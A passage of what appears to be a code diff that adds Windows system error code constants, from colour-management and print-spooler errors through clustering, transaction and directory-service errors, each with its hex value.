+ METAFILE_NOT_SUPPORTED = 0x07D3 + TRANSFORM_NOT_SUPPORTED = 0x07D4 + CLIPPING_NOT_SUPPORTED = 0x07D5 + INVALID_CMM = 0x07DA + INVALID_PROFILE = 0x07DB + TAG_NOT_FOUND = 0x07DC + TAG_NOT_PRESENT = 0x07DD + DUPLICATE_TAG = 0x07DE + 
PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF + PROFILE_NOT_FOUND = 0x07E0 + INVALID_COLORSPACE = 0x07E1 + ICM_NOT_ENABLED = 0x07E2 + DELETING_ICM_XFORM = 0x07E3 + INVALID_TRANSFORM = 0x07E4 + COLORSPACE_MISMATCH = 0x07E5 + INVALID_COLORINDEX = 0x07E6 + PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 + CONNECTED_OTHER_PASSWORD = 0x083C + CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D + BAD_USERNAME = 0x089A + NOT_CONNECTED = 0x08CA + OPEN_FILES = 0x0961 + ACTIVE_CONNECTIONS = 0x0962 + DEVICE_IN_USE = 0x0964 + UNKNOWN_PRINT_MONITOR = 0x0BB8 + PRINTER_DRIVER_IN_USE = 0x0BB9 + SPOOL_FILE_NOT_FOUND = 0x0BBA + SPL_NO_STARTDOC = 0x0BBB + SPL_NO_ADDJOB = 0x0BBC + PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD + PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE + INVALID_PRINT_MONITOR = 0x0BBF + PRINT_MONITOR_IN_USE = 0x0BC0 + PRINTER_HAS_JOBS_QUEUED = 0x0BC1 + SUCCESS_REBOOT_REQUIRED = 0x0BC2 + SUCCESS_RESTART_REQUIRED = 0x0BC3 + PRINTER_NOT_FOUND = 0x0BC4 + PRINTER_DRIVER_WARNED = 0x0BC5 + PRINTER_DRIVER_BLOCKED = 0x0BC6 + PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 + CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 + FAIL_REBOOT_REQUIRED = 0x0BC9 + FAIL_REBOOT_INITIATED = 0x0BCA + PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB + PRINT_JOB_RESTART_REQUIRED = 0x0BCC + IO_REISSUE_AS_CACHED = 0x0F6E + WINS_INTERNAL = 0x0FA0 + CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 + STATIC_INIT = 0x0FA2 + INC_BACKUP = 0x0FA3 + FULL_BACKUP = 0x0FA4 + REC_NON_EXISTENT = 0x0FA5 + RPL_NOT_ALLOWED = 0x0FA6 + PEERDIST_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 + PEERDIST_CANNOT_PARSE_CONTENTINFO = 0x0FD3 + PEERDIST_MISSING_DATA = 0x0FD4 + PEERDIST_NO_MORE = 0x0FD5 + PEERDIST_NOT_INITIALIZED = 0x0FD6 + PEERDIST_ALREADY_INITIALIZED = 0x0FD7 + PEERDIST_SHUTDOWN_IN_PROGRESS = 0x0FD8 + PEERDIST_INVALIDATED = 0x0FD9 + PEERDIST_ALREADY_EXISTS = 0x0FDA + PEERDIST_OPERATION_NOTFOUND = 0x0FDB + PEERDIST_ALREADY_COMPLETED = 0x0FDC + PEERDIST_OUT_OF_BOUNDS = 0x0FDD + PEERDIST_VERSION_UNSUPPORTED = 0x0FDE + PEERDIST_INVALID_CONFIGURATION = 0x0FDF + 
PEERDIST_NOT_LICENSED = 0x0FE0 + PEERDIST_SERVICE_UNAVAILABLE = 0x0FE1 + DHCP_ADDRESS_CONFLICT = 0x1004 + WMI_GUID_NOT_FOUND = 0x1068 + WMI_INSTANCE_NOT_FOUND = 0x1069 + WMI_ITEMID_NOT_FOUND = 0x106A + WMI_TRY_AGAIN = 0x106B + WMI_DP_NOT_FOUND = 0x106C + WMI_UNRESOLVED_INSTANCE_REF = 0x106D + WMI_ALREADY_ENABLED = 0x106E + WMI_GUID_DISCONNECTED = 0x106F + WMI_SERVER_UNAVAILABLE = 0x1070 + WMI_DP_FAILED = 0x1071 + WMI_INVALID_MOF = 0x1072 + WMI_INVALID_REGINFO = 0x1073 + WMI_ALREADY_DISABLED = 0x1074 + WMI_READ_ONLY = 0x1075 + WMI_SET_FAILURE = 0x1076 + INVALID_MEDIA = 0x10CC + INVALID_LIBRARY = 0x10CD + INVALID_MEDIA_POOL = 0x10CE + DRIVE_MEDIA_MISMATCH = 0x10CF + MEDIA_OFFLINE = 0x10D0 + LIBRARY_OFFLINE = 0x10D1 + EMPTY = 0x10D2 + NOT_EMPTY = 0x10D3 + MEDIA_UNAVAILABLE = 0x10D4 + RESOURCE_DISABLED = 0x10D5 + INVALID_CLEANER = 0x10D6 + UNABLE_TO_CLEAN = 0x10D7 + OBJECT_NOT_FOUND = 0x10D8 + DATABASE_FAILURE = 0x10D9 + DATABASE_FULL = 0x10DA + MEDIA_INCOMPATIBLE = 0x10DB + RESOURCE_NOT_PRESENT = 0x10DC + INVALID_OPERATION = 0x10DD + MEDIA_NOT_AVAILABLE = 0x10DE + DEVICE_NOT_AVAILABLE = 0x10DF + REQUEST_REFUSED = 0x10E0 + INVALID_DRIVE_OBJECT = 0x10E1 + LIBRARY_FULL = 0x10E2 + MEDIUM_NOT_ACCESSIBLE = 0x10E3 + UNABLE_TO_LOAD_MEDIUM = 0x10E4 + UNABLE_TO_INVENTORY_DRIVE = 0x10E5 + UNABLE_TO_INVENTORY_SLOT = 0x10E6 + UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 + TRANSPORT_FULL = 0x10E8 + CONTROLLING_IEPORT = 0x10E9 + UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA + CLEANER_SLOT_SET = 0x10EB + CLEANER_SLOT_NOT_SET = 0x10EC + CLEANER_CARTRIDGE_SPENT = 0x10ED + UNEXPECTED_OMID = 0x10EE + CANT_DELETE_LAST_ITEM = 0x10EF + MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 + VOLUME_CONTAINS_SYS_FILES = 0x10F1 + INDIGENOUS_TYPE = 0x10F2 + NO_SUPPORTING_DRIVES = 0x10F3 + CLEANER_CARTRIDGE_INSTALLED = 0x10F4 + IEPORT_FULL = 0x10F5 + FILE_OFFLINE = 0x10FE + REMOTE_STORAGE_NOT_ACTIVE = 0x10FF + REMOTE_STORAGE_MEDIA_ERROR = 0x1100 + NOT_A_REPARSE_POINT = 0x1126 + REPARSE_ATTRIBUTE_CONFLICT = 0x1127 + 
INVALID_REPARSE_DATA = 0x1128 + REPARSE_TAG_INVALID = 0x1129 + REPARSE_TAG_MISMATCH = 0x112A + VOLUME_NOT_SIS_ENABLED = 0x1194 + DEPENDENT_RESOURCE_EXISTS = 0x1389 + DEPENDENCY_NOT_FOUND = 0x138A + DEPENDENCY_ALREADY_EXISTS = 0x138B + RESOURCE_NOT_ONLINE = 0x138C + HOST_NODE_NOT_AVAILABLE = 0x138D + RESOURCE_NOT_AVAILABLE = 0x138E + RESOURCE_NOT_FOUND = 0x138F + SHUTDOWN_CLUSTER = 0x1390 + CANT_EVICT_ACTIVE_NODE = 0x1391 + OBJECT_ALREADY_EXISTS = 0x1392 + OBJECT_IN_LIST = 0x1393 + GROUP_NOT_AVAILABLE = 0x1394 + GROUP_NOT_FOUND = 0x1395 + GROUP_NOT_ONLINE = 0x1396 + HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 + HOST_NODE_NOT_GROUP_OWNER = 0x1398 + RESMON_CREATE_FAILED = 0x1399 + RESMON_ONLINE_FAILED = 0x139A + RESOURCE_ONLINE = 0x139B + QUORUM_RESOURCE = 0x139C + NOT_QUORUM_CAPABLE = 0x139D + CLUSTER_SHUTTING_DOWN = 0x139E + INVALID_STATE = 0x139F + RESOURCE_PROPERTIES_STORED = 0x13A0 + NOT_QUORUM_CLASS = 0x13A1 + CORE_RESOURCE = 0x13A2 + QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 + QUORUMLOG_OPEN_FAILED = 0x13A4 + CLUSTERLOG_CORRUPT = 0x13A5 + CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 + CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 + CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 + CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 + QUORUM_OWNER_ALIVE = 0x13AA + NETWORK_NOT_AVAILABLE = 0x13AB + NODE_NOT_AVAILABLE = 0x13AC + ALL_NODES_NOT_AVAILABLE = 0x13AD + RESOURCE_FAILED = 0x13AE + CLUSTER_INVALID_NODE = 0x13AF + CLUSTER_NODE_EXISTS = 0x13B0 + CLUSTER_JOIN_IN_PROGRESS = 0x13B1 + CLUSTER_NODE_NOT_FOUND = 0x13B2 + CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 + CLUSTER_NETWORK_EXISTS = 0x13B4 + CLUSTER_NETWORK_NOT_FOUND = 0x13B5 + CLUSTER_NETINTERFACE_EXISTS = 0x13B6 + CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 + CLUSTER_INVALID_REQUEST = 0x13B8 + CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 + CLUSTER_NODE_DOWN = 0x13BA + CLUSTER_NODE_UNREACHABLE = 0x13BB + CLUSTER_NODE_NOT_MEMBER = 0x13BC + CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD + CLUSTER_INVALID_NETWORK = 0x13BE + CLUSTER_NODE_UP = 0x13C0 + CLUSTER_IPADDR_IN_USE = 
0x13C1 + CLUSTER_NODE_NOT_PAUSED = 0x13C2 + CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 + CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 + CLUSTER_NODE_ALREADY_UP = 0x13C5 + CLUSTER_NODE_ALREADY_DOWN = 0x13C6 + CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 + CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 + CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 + CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA + CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB + INVALID_OPERATION_ON_QUORUM = 0x13CC + DEPENDENCY_NOT_ALLOWED = 0x13CD + CLUSTER_NODE_PAUSED = 0x13CE + NODE_CANT_HOST_RESOURCE = 0x13CF + CLUSTER_NODE_NOT_READY = 0x13D0 + CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 + CLUSTER_JOIN_ABORTED = 0x13D2 + CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 + CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 + CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 + CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 + CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 + CLUSTER_RESNAME_NOT_FOUND = 0x13D8 + CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 + CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA + CLUSTER_DATABASE_SEQMISMATCH = 0x13DB + RESMON_INVALID_STATE = 0x13DC + CLUSTER_GUM_NOT_LOCKER = 0x13DD + QUORUM_DISK_NOT_FOUND = 0x13DE + DATABASE_BACKUP_CORRUPT = 0x13DF + CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 + RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 + CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 + CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 + CLUSTER_MEMBERSHIP_HALT = 0x1704 + CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 + CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 + CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 + CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 + CLUSTER_PARAMETER_MISMATCH = 0x1709 + NODE_CANNOT_BE_CLUSTERED = 0x170A + CLUSTER_WRONG_OS_VERSION = 0x170B + CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C + CLUSCFG_ALREADY_COMMITTED = 0x170D + CLUSCFG_ROLLBACK_FAILED = 0x170E + CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F + CLUSTER_OLD_VERSION = 0x1710 + CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 + CLUSTER_NO_NET_ADAPTERS = 0x1712 + CLUSTER_POISONED = 0x1713 + CLUSTER_GROUP_MOVING = 0x1714 + 
CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 + RESOURCE_CALL_TIMED_OUT = 0x1716 + INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 + CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 + CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 + CLUSTER_PARTIAL_SEND = 0x171A + CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B + CLUSTER_INVALID_STRING_TERMINATION = 0x171C + CLUSTER_INVALID_STRING_FORMAT = 0x171D + CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E + CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F + CLUSTER_NULL_DATA = 0x1720 + CLUSTER_PARTIAL_READ = 0x1721 + CLUSTER_PARTIAL_WRITE = 0x1722 + CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 + DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 + CLUSTER_NO_QUORUM = 0x1725 + CLUSTER_INVALID_IPV6_NETWORK = 0x1726 + CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 + QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 + DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 + EXCEPTION_IN_RESOURCE_CALL = 0x172A + CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B + CLUSTER_NOT_INSTALLED = 0x172C + CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D + CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E + CLUSTER_TOO_MANY_NODES = 0x172F + CLUSTER_OBJECT_ALREADY_USED = 0x1730 + NONCORE_GROUPS_FOUND = 0x1731 + FILE_SHARE_RESOURCE_CONFLICT = 0x1732 + CLUSTER_EVICT_INVALID_REQUEST = 0x1733 + CLUSTER_SINGLETON_RESOURCE = 0x1734 + CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 + CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 + CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 + CLUSTER_GROUP_BUSY = 0x1738 + CLUSTER_NOT_SHARED_VOLUME = 0x1739 + CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A + CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B + CLUSTER_USE_SHARED_VOLUMES_API = 0x173C + CLUSTER_BACKUP_IN_PROGRESS = 0x173D + NON_CSV_PATH = 0x173E + CSV_VOLUME_NOT_LOCAL = 0x173F + CLUSTER_WATCHDOG_TERMINATING = 0x1740 + ENCRYPTION_FAILED = 0x1770 + DECRYPTION_FAILED = 0x1771 + FILE_ENCRYPTED = 0x1772 + NO_RECOVERY_POLICY = 0x1773 + NO_EFS = 0x1774 + WRONG_EFS = 0x1775 + NO_USER_KEYS = 0x1776 + FILE_NOT_ENCRYPTED = 0x1777 + NOT_EXPORT_FORMAT = 0x1778 + 
FILE_READ_ONLY = 0x1779 + DIR_EFS_DISALLOWED = 0x177A + EFS_SERVER_NOT_TRUSTED = 0x177B + BAD_RECOVERY_POLICY = 0x177C + EFS_ALG_BLOB_TOO_BIG = 0x177D + VOLUME_NOT_SUPPORT_EFS = 0x177E + EFS_DISABLED = 0x177F + EFS_VERSION_NOT_SUPPORT = 0x1780 + CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 + CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 + CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 + CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 + CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 + NO_BROWSER_SERVERS_FOUND = 0x17E6 + SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x1838 + LOG_SECTOR_INVALID = 0x19C8 + LOG_SECTOR_PARITY_INVALID = 0x19C9 + LOG_SECTOR_REMAPPED = 0x19CA + LOG_BLOCK_INCOMPLETE = 0x19CB + LOG_INVALID_RANGE = 0x19CC + LOG_BLOCKS_EXHAUSTED = 0x19CD + LOG_READ_CONTEXT_INVALID = 0x19CE + LOG_RESTART_INVALID = 0x19CF + LOG_BLOCK_VERSION = 0x19D0 + LOG_BLOCK_INVALID = 0x19D1 + LOG_READ_MODE_INVALID = 0x19D2 + LOG_NO_RESTART = 0x19D3 + LOG_METADATA_CORRUPT = 0x19D4 + LOG_METADATA_INVALID = 0x19D5 + LOG_METADATA_INCONSISTENT = 0x19D6 + LOG_RESERVATION_INVALID = 0x19D7 + LOG_CANT_DELETE = 0x19D8 + LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 + LOG_START_OF_LOG = 0x19DA + LOG_POLICY_ALREADY_INSTALLED = 0x19DB + LOG_POLICY_NOT_INSTALLED = 0x19DC + LOG_POLICY_INVALID = 0x19DD + LOG_POLICY_CONFLICT = 0x19DE + LOG_PINNED_ARCHIVE_TAIL = 0x19DF + LOG_RECORD_NONEXISTENT = 0x19E0 + LOG_RECORDS_RESERVED_INVALID = 0x19E1 + LOG_SPACE_RESERVED_INVALID = 0x19E2 + LOG_TAIL_INVALID = 0x19E3 + LOG_FULL = 0x19E4 + COULD_NOT_RESIZE_LOG = 0x19E5 + LOG_MULTIPLEXED = 0x19E6 + LOG_DEDICATED = 0x19E7 + LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 + LOG_ARCHIVE_IN_PROGRESS = 0x19E9 + LOG_EPHEMERAL = 0x19EA + LOG_NOT_ENOUGH_CONTAINERS = 0x19EB + LOG_CLIENT_ALREADY_REGISTERED = 0x19EC + LOG_CLIENT_NOT_REGISTERED = 0x19ED + LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE + LOG_CONTAINER_READ_FAILED = 0x19EF + LOG_CONTAINER_WRITE_FAILED = 0x19F0 + LOG_CONTAINER_OPEN_FAILED = 0x19F1 + LOG_CONTAINER_STATE_INVALID = 0x19F2 + LOG_STATE_INVALID = 
0x19F3 + LOG_PINNED = 0x19F4 + LOG_METADATA_FLUSH_FAILED = 0x19F5 + LOG_INCONSISTENT_SECURITY = 0x19F6 + LOG_APPENDED_FLUSH_FAILED = 0x19F7 + LOG_PINNED_RESERVATION = 0x19F8 + INVALID_TRANSACTION = 0x1A2C + TRANSACTION_NOT_ACTIVE = 0x1A2D + TRANSACTION_REQUEST_NOT_VALID = 0x1A2E + TRANSACTION_NOT_REQUESTED = 0x1A2F + TRANSACTION_ALREADY_ABORTED = 0x1A30 + TRANSACTION_ALREADY_COMMITTED = 0x1A31 + TM_INITIALIZATION_FAILED = 0x1A32 + RESOURCEMANAGER_READ_ONLY = 0x1A33 + TRANSACTION_NOT_JOINED = 0x1A34 + TRANSACTION_SUPERIOR_EXISTS = 0x1A35 + CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 + TRANSACTION_PROPAGATION_FAILED = 0x1A37 + CRM_PROTOCOL_NOT_FOUND = 0x1A38 + TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 + CURRENT_TRANSACTION_NOT_VALID = 0x1A3A + TRANSACTION_NOT_FOUND = 0x1A3B + RESOURCEMANAGER_NOT_FOUND = 0x1A3C + ENLISTMENT_NOT_FOUND = 0x1A3D + TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E + TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F + TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 + TRANSACTION_NOT_ROOT = 0x1A41 + TRANSACTION_OBJECT_EXPIRED = 0x1A42 + TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 + TRANSACTION_RECORD_TOO_LONG = 0x1A44 + IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 + TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 + TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 + RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 + TRANSACTION_MUST_WRITETHROUGH = 0x1A49 + TRANSACTION_NO_SUPERIOR = 0x1A4A + HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B + TRANSACTIONAL_CONFLICT = 0x1A90 + RM_NOT_ACTIVE = 0x1A91 + RM_METADATA_CORRUPT = 0x1A92 + DIRECTORY_NOT_RM = 0x1A93 + TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 + LOG_RESIZE_INVALID_SIZE = 0x1A96 + OBJECT_NO_LONGER_EXISTS = 0x1A97 + STREAM_MINIVERSION_NOT_FOUND = 0x1A98 + STREAM_MINIVERSION_NOT_VALID = 0x1A99 + MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A + CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B + CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C + REMOTE_FILE_VERSION_MISMATCH = 0x1A9E + HANDLE_NO_LONGER_VALID = 0x1A9F + NO_TXF_METADATA = 
0x1AA0 + LOG_CORRUPTION_DETECTED = 0x1AA1 + CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 + RM_DISCONNECTED = 0x1AA3 + ENLISTMENT_NOT_SUPERIOR = 0x1AA4 + RECOVERY_NOT_NEEDED = 0x1AA5 + RM_ALREADY_STARTED = 0x1AA6 + FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 + CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 + CANT_CROSS_RM_BOUNDARY = 0x1AA9 + TXF_DIR_NOT_EMPTY = 0x1AAA + INDOUBT_TRANSACTIONS_EXIST = 0x1AAB + TM_VOLATILE = 0x1AAC + ROLLBACK_TIMER_EXPIRED = 0x1AAD + TXF_ATTRIBUTE_CORRUPT = 0x1AAE + EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF + TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 + LOG_GROWTH_FAILED = 0x1AB1 + TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 + TXF_METADATA_ALREADY_PRESENT = 0x1AB3 + TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 + TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 + CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 + TRANSACTIONS_NOT_FROZEN = 0x1AB7 + TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 + NOT_SNAPSHOT_VOLUME = 0x1AB9 + NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA + DATA_LOST_REPAIR = 0x1ABB + SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC + TM_IDENTITY_MISMATCH = 0x1ABD + FLOATED_SECTION = 0x1ABE + CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF + CANNOT_ABORT_TRANSACTIONS = 0x1AC0 + BAD_CLUSTERS = 0x1AC1 + COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 + VOLUME_DIRTY = 0x1AC3 + NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 + OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 + EXPIRED_HANDLE = 0x1AC6 + TRANSACTION_NOT_ENLISTED = 0x1AC7 + CTX_WINSTATION_NAME_INVALID = 0x1B59 + CTX_INVALID_PD = 0x1B5A + CTX_PD_NOT_FOUND = 0x1B5B + CTX_WD_NOT_FOUND = 0x1B5C + CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D + CTX_SERVICE_NAME_COLLISION = 0x1B5E + CTX_CLOSE_PENDING = 0x1B5F + CTX_NO_OUTBUF = 0x1B60 + CTX_MODEM_INF_NOT_FOUND = 0x1B61 + CTX_INVALID_MODEMNAME = 0x1B62 + CTX_MODEM_RESPONSE_ERROR = 0x1B63 + CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 + CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 + CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 + CTX_MODEM_RESPONSE_BUSY = 0x1B67 + CTX_MODEM_RESPONSE_VOICE = 0x1B68 + CTX_TD_ERROR = 
0x1B69 + CTX_WINSTATION_NOT_FOUND = 0x1B6E + CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F + CTX_WINSTATION_BUSY = 0x1B70 + CTX_BAD_VIDEO_MODE = 0x1B71 + CTX_GRAPHICS_INVALID = 0x1B7B + CTX_LOGON_DISABLED = 0x1B7D + CTX_NOT_CONSOLE = 0x1B7E + CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 + CTX_CONSOLE_DISCONNECT = 0x1B81 + CTX_CONSOLE_CONNECT = 0x1B82 + CTX_SHADOW_DENIED = 0x1B84 + CTX_WINSTATION_ACCESS_DENIED = 0x1B85 + CTX_INVALID_WD = 0x1B89 + CTX_SHADOW_INVALID = 0x1B8A + CTX_SHADOW_DISABLED = 0x1B8B + CTX_CLIENT_LICENSE_IN_USE = 0x1B8C + CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D + CTX_LICENSE_NOT_AVAILABLE = 0x1B8E + CTX_LICENSE_CLIENT_INVALID = 0x1B8F + CTX_LICENSE_EXPIRED = 0x1B90 + CTX_SHADOW_NOT_RUNNING = 0x1B91 + CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 + ACTIVATION_COUNT_EXCEEDED = 0x1B93 + CTX_WINSTATIONS_DISABLED = 0x1B94 + CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 + CTX_SESSION_IN_USE = 0x1B96 + CTX_NO_FORCE_LOGOFF = 0x1B97 + CTX_ACCOUNT_RESTRICTION = 0x1B98 + RDP_PROTOCOL_ERROR = 0x1B99 + CTX_CDM_CONNECT = 0x1B9A + CTX_CDM_DISCONNECT = 0x1B9B + CTX_SECURITY_LAYER_ERROR = 0x1B9C + TS_INCOMPATIBLE_SESSIONS = 0x1B9D + TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E + FRS_ERR_INVALID_API_SEQUENCE = 0x1F41 + FRS_ERR_STARTING_SERVICE = 0x1F42 + FRS_ERR_STOPPING_SERVICE = 0x1F43 + FRS_ERR_INTERNAL_API = 0x1F44 + FRS_ERR_INTERNAL = 0x1F45 + FRS_ERR_SERVICE_COMM = 0x1F46 + FRS_ERR_INSUFFICIENT_PRIV = 0x1F47 + FRS_ERR_AUTHENTICATION = 0x1F48 + FRS_ERR_PARENT_INSUFFICIENT_PRIV = 0x1F49 + FRS_ERR_PARENT_AUTHENTICATION = 0x1F4A + FRS_ERR_CHILD_TO_PARENT_COMM = 0x1F4B + FRS_ERR_PARENT_TO_CHILD_COMM = 0x1F4C + FRS_ERR_SYSVOL_POPULATE = 0x1F4D + FRS_ERR_SYSVOL_POPULATE_TIMEOUT = 0x1F4E + FRS_ERR_SYSVOL_IS_BUSY = 0x1F4F + FRS_ERR_SYSVOL_DEMOTE = 0x1F50 + FRS_ERR_INVALID_SERVICE_PARAMETER = 0x1F51 + DS_NOT_INSTALLED = 0x2008 + DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 + DS_NO_ATTRIBUTE_OR_VALUE = 0x200A + DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B + DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C + DS_ATTRIBUTE_OR_VALUE_EXISTS 
= 0x200D + DS_BUSY = 0x200E + DS_UNAVAILABLE = 0x200F + DS_NO_RIDS_ALLOCATED = 0x2010 + DS_NO_MORE_RIDS = 0x2011 + DS_INCORRECT_ROLE_OWNER = 0x2012 + DS_RIDMGR_INIT_ERROR = 0x2013 + DS_OBJ_CLASS_VIOLATION = 0x2014 + DS_CANT_ON_NON_LEAF = 0x2015 + DS_CANT_ON_RDN = 0x2016 + DS_CANT_MOD_OBJ_CLASS = 0x2017 + DS_CROSS_DOM_MOVE_ERROR = 0x2018 + DS_GC_NOT_AVAILABLE = 0x2019 + SHARED_POLICY = 0x201A + POLICY_OBJECT_NOT_FOUND = 0x201B + POLICY_ONLY_IN_DS = 0x201C + PROMOTION_ACTIVE = 0x201D + NO_PROMOTION_ACTIVE = 0x201E + DS_OPERATIONS_ERROR = 0x2020 + DS_PROTOCOL_ERROR = 0x2021 + DS_TIMELIMIT_EXCEEDED = 0x2022 + DS_SIZELIMIT_EXCEEDED = 0x2023 + DS_ADMIN_LIMIT_EXCEEDED = 0x2024 + DS_COMPARE_FALSE = 0x2025 + DS_COMPARE_TRUE = 0x2026 + DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 + DS_STRONG_AUTH_REQUIRED = 0x2028 + DS_INAPPROPRIATE_AUTH = 0x2029 + DS_AUTH_UNKNOWN = 0x202A + DS_REFERRAL = 0x202B + DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C + DS_CONFIDENTIALITY_REQUIRED = 0x202D + DS_INAPPROPRIATE_MATCHING = 0x202E + DS_CONSTRAINT_VIOLATION = 0x202F + DS_NO_SUCH_OBJECT = 0x2030 